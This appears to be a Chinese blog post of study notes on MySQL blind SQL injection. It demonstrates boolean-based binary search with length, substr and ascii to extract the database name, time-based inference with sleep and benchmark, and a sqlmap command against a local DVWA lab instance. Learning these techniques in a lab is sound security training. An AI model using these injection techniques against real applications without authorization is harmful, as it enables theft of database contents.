zoukankan      html  css  js  c++  java

  • sql盲注-笔记

     盲注是因为数据库查询的结果不会直接显示在页面。只能通过构造查询语句查看反馈的结果真&假状态来判断信息。
     
    实际注入手法和回显注入区别不大
    下面只记录相关思路
     
    select length('test'); 查看字符串长度
    二分法判断数据库名字的长度
    mysql> select length(database())>10;
    +-----------------------+
    | length(database())>10 |
    +-----------------------+
    |                     0 |
    +-----------------------+
    1 row in set (0.00 sec)
     
    mysql> select length(database())>5;
    +----------------------+
    | length(database())>5 |
    +----------------------+
    |                    0 |
    +----------------------+
    1 row in set (0.00 sec)
     
    mysql> select length(database())>3;
    +----------------------+
    | length(database())>3 |
    +----------------------+
    |                    1 |
    +----------------------+
    1 row in set (0.00 sec)
     
    mysql> select length(database())=4;
    +----------------------+
    | length(database())=4 |
    +----------------------+
    |                    1 |
    +----------------------+
    1 row in set (0.00 sec)
     
    mysql> select substr(database(),1,1);
    +------------------------+
    | substr(database(),1,1) |
    +------------------------+
    | d                      |
    +------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>64;
    +----------------------------------+
    | ascii(substr(database(),1,1))>64 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>100;
    +-----------------------------------+
    | ascii(substr(database(),1,1))>100 |
    +-----------------------------------+
    |                                 0 |
    +-----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>80;
    +----------------------------------+
    | ascii(substr(database(),1,1))>80 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>90;
    +----------------------------------+
    | ascii(substr(database(),1,1))>90 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>95;
    +----------------------------------+
    | ascii(substr(database(),1,1))>95 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>97;
    +----------------------------------+
    | ascii(substr(database(),1,1))>97 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>98;
    +----------------------------------+
    | ascii(substr(database(),1,1))>98 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>99;
    +----------------------------------+
    | ascii(substr(database(),1,1))>99 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))=100;
    +-----------------------------------+
    | ascii(substr(database(),1,1))=100 |
    +-----------------------------------+
    |                                 1 |
    +-----------------------------------+
    1 row in set (0.00 sec)
     
    使用二分法判断出数据库第一个字母ascii码为100 对应的字母为小写d
     
    另外盲注还可以通过延时来判断
    mysql> select sleep(if(length(database())=4,3,0));
    +-------------------------------------+
    | sleep(if(length(database())=4,3,0)) |
    +-------------------------------------+
    |                                   0 |
    +-------------------------------------+
    1 row in set (3.00 sec)
     
    mysql> select sleep(if(length(database())=5,3,0));
    +-------------------------------------+
    | sleep(if(length(database())=5,3,0)) |
    +-------------------------------------+
    |                                   0 |
    +-------------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select sleep(if(length(database())=5,3,0));  
    通过响应返回的延时来判断信息是否正确
     
    也可以用 benchmark重复执行命令函数来进行延时
    mysql> select benchmark(50000,md5('test'));
     
    +------------------------------+
    | benchmark(50000,md5('test')) |
    +------------------------------+
    |                            0 |
    +------------------------------+
    1 row in set (0.02 sec)
     
    mysql> select benchmark(5000000,md5('test'));
    +--------------------------------+
    | benchmark(5000000,md5('test')) |
    +--------------------------------+
    |                              0 |
    +--------------------------------+
    1 row in set (1.45 sec)
     
     
    DVWA high难度
    python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli_blind/" -p "id" --cookie "PHPSESSID=dv9h9urfu9bf9udkd7ih6qdbj3;id=1;security=high" --level 2
    查询字段在cookie内  需要设置--level 2
     
     
     
  • 相关阅读:
    NoSql
    事务简介
    c#批量插入
    SqlServer中获取所有数据库,所有表,所有字段
    企业需要k2来解放孤岛危机
    路在何方?移动互联网浪潮下房地产转型之路探讨
    卡斯柯经验谈│流程驱动项目管理的应用
    【干货来了】2014年K2房地产IT分享峰会
    【快报】基于K2 BPM的新一代协同办公门户实践交流会
    元祖签约K2 BPM,引领绿色健康食品!
  • 原文地址:https://www.cnblogs.com/enderzhou/p/6884537.html
Copyright © 2011-2022 走看看